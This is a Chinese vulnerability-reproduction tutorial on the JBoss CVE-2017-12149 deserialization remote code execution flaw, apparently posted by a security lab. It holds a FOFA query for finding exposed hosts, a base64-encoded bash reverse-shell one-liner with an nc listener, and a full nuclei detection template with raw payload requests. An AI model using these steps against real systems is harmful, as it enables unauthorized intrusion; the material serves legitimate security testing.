0x01 漏洞描述
JBoss是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。JBoss反序列化漏洞,该漏洞位于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。
0x02 漏洞复现
漏洞影响:JbossAS 5.x JbossAS 6.x
FOFA:app="jboss"
1.访问存在漏洞页面,由图中反序列化方法可知,此处服务器将用户提交的POST内容进行了Java反序列化。
http://x.x.x.x:8080/invoker/readonly
2.使用CVE-2017-12149 Jboss反序列化工具,反弹shell(注:需要改为base64编码解码的反弹shell脚本)(需要此工具公众号发送CVE-2017-12149即可获得)
编码地址:https://ir0ny.top/pentest/reverse-encoder-shell.html反弹shell脚本:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xIuMTxLjEuxkvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}
3. nc监听得到一个shell
nc -lnvp 7777
4.使用nuclei批量验证1.txt文件中的url是否存在该漏洞,显示存在漏洞。(nuclei稳定快,编写poc简单,有社区维护,推荐使用)
nuclei下载地址:https://github.com/projectdiscovery/nuclei
批量验证命令:nuclei -list 1.txt -t cves/2017/CVE-2017-12149.yamlyaml POC:id: CVE-2017-12149info:name: Java/Jboss Deserialization [RCE]author: fopinaseverity: criticaldescription: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data.reference:- https://nvd.nist.gov/vuln/detail/CVE-2017-12149- https://chowdera.com/2020/12/20201229190934023w.html- https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149classification:cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Hcvss-score: 9.8cve-id: CVE-2017-12149cwe-id: CWE-502tags: cve,cve2017,jboss,java,rce,deserializationrequests:- raw:- |POST /invoker/JMXInvokerServlet/ HTTP/1.1Host: {{Hostname}}Content-Type: application/octet-stream{{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}- |POST /invoker/EJBInvokerServlet/ HTTP/1.1Host: {{Hostname}}Content-Type: application/octet-stream{{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}matchers-condition: andmatchers:- type: wordwords:- "ClassCastException"part: body- type: wordwords:- "application/x-java-serialized-object"part: header
(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)
0x03 公司简介
江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......
编制:sm
审核:fjh
审核:Dog
原文始发于微信公众号(融云攻防实验室):漏洞复现-CVE-2017-12149 JBoss反序列化远程代码执行
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论